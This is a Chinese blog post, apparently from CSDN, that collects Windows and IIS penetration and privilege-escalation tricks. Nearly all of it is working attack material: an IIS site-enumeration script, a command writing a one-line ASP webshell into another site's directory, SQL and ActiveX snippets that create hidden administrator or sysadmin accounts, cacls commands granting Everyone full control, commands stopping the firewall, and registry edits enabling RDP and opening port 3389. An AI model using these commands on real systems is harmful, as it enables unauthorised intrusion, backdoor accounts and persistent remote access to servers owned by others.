Windows渗透与提权：技巧总结篇

最新推荐文章于 2024-08-21 15:40:20 发布

Coisini、

最新推荐文章于 2024-08-21 15:40:20 发布

阅读量1.7k

点赞数 2

分类专栏：安全开发实战篇文章标签： windows提权与渗透 Windows总结渗透

本文链接：https://blog.csdn.net/kclax/article/details/93392698

版权

旁站路径问题：

1、读网站配置。

2、用以下VBS：

On Error Resume Next

If (LCase(Right(WScript.Fullname, 11)) = "wscript.exe") Then

MsgBox Space(12) &amp; "IIS Virtual Web Viewer" &amp; Space(12) &amp; Chr(13) &amp; Space(9) &amp; " Usage:Cscript vWeb.vbs", 4096, "Lilo"

WScript.Quit

End If

Set objservice = GetObject("IIS://LocalHost/W3SVC")

For Each obj3w In objservice

If IsNumeric(obj3w.Name) Then

Set OService = GetObject("IIS://LocalHost/W3SVC/" &amp; obj3w.Name)

Set VDirObj = OService.GetObject("IIsWebVirtualDir", "ROOT")

If Err &lt;&gt; 0 Then WScript.Quit (1)

WScript.Echo Chr(10) &amp; "[" &amp; OService.ServerComment &amp; "]"

For Each Binds In OService.ServerBindings

Web = "{ " &amp; Replace(Binds, ":", " } { ") &amp; " }"

WScript.Echo Replace(Split(Replace(Web, " ", ""), "}{")(2), "}", "")

Next

WScript.Echo "Path            : " &amp; VDirObj.Path

End If

Next

3、iis_spy 列举（注：需要支持ASPX，反IISSPY的方法：将 activeds.dll，activeds.tlb 降权）。

4、得到目标站目录，不能直接跨的。可以通过“echo ^{<%execute(request(“cmd”))%}> >>X:\目标目录\X.asp”或者“copy 脚本文件 X:\目标目录\X.asp”像目标目录写入webshell，或者还可以试试type命令。

网站可能目录（注：一般是虚拟主机类）：

data/htdocs.网站/网站/

CMD 下操作 VPN 相关知识、资料：

#允许administrator拨入该VPN：

netsh ras set user administrator permit

#禁止administrator拨入该VPN：

netsh ras set user administrator deny

#查看哪些用户可以拨入VPN：

netsh ras show user

#查看VPN分配IP的方式：

netsh ras ip show config

#使用地址池的方式分配IP：

netsh ras ip set addrassign method = pool

#地址池的范围是从192.168.3.1到192.168.3.254：

netsh ras ip add range from = 192.168.3.1 to = 192.168.3.254

Cmd、Dos 命令行下添加 SQL 用户的方法：

需要有管理员权限，在命令下先建立一个“c:\test.qry”文件，内容如下：

exec master.dbo.sp_addlogin test,123
 
EXEC sp_addsrvrolemember 'test, 'sysadmin'

然后在DOS下执行：cmd.exe /c isql -E /U alma /P /i c:\test.qry

另类的加用户方法：

在删掉了 net.exe 和不用 adsi 之外，新的加用户的方法。代码如下：

js:

var o=new ActiveXObject( "Shell.Users" );

z=o.create("test") ;

z.changePassword("123456","")

z.setting("AccountType")=3;

 vbs:

Set o=CreateObject( "Shell.Users" )

Set z=o.create("test")

z.changePassword "123456",""

z.setting("AccountType")=3

Cmd 访问控制权限控制：

命令如下：

cacls c: /e /t /g everyone:F           #c盘everyone权限

cacls "目录" /d everyone               #everyone不可读，包括admin

备注：

反制方法，在文件夹安全设置里将 Everyone 设定为不可读，如果没有安全性选项：工具 – 文件夹选项 – 使用简单的共享去掉即可。

3389 相关，以下配合PR更好：

a、防火墙TCP/IP筛选.（关闭：net stop policyagent & net stop sharedaccess）

b、内网环境（lcx.exe）

c、终端服务器超出了最大允许连接（XP 运行：mstsc /admin；2003 运行：mstsc /console）

1.查询终端端口：

 REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber

2.开启XP&2003终端服务：

 REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

3.更改终端端口为2008(十六进制为：0x7d8)：

 REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x7d8 /f

 REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x7D8 /f

4.取消xp&2003系统防火墙对终端服务的限制及IP连接的限制：

REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabled :@  xpsp2res.dll,-22009 /f

create table a (cmd text);

insert into a values ("set wshshell=createobject (""wscript.shell"")");

insert into a values ("a=wshshell.run (""cmd.exe /c net user admin admin /add"",0)");

insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators admin /add"",0)");

select * from a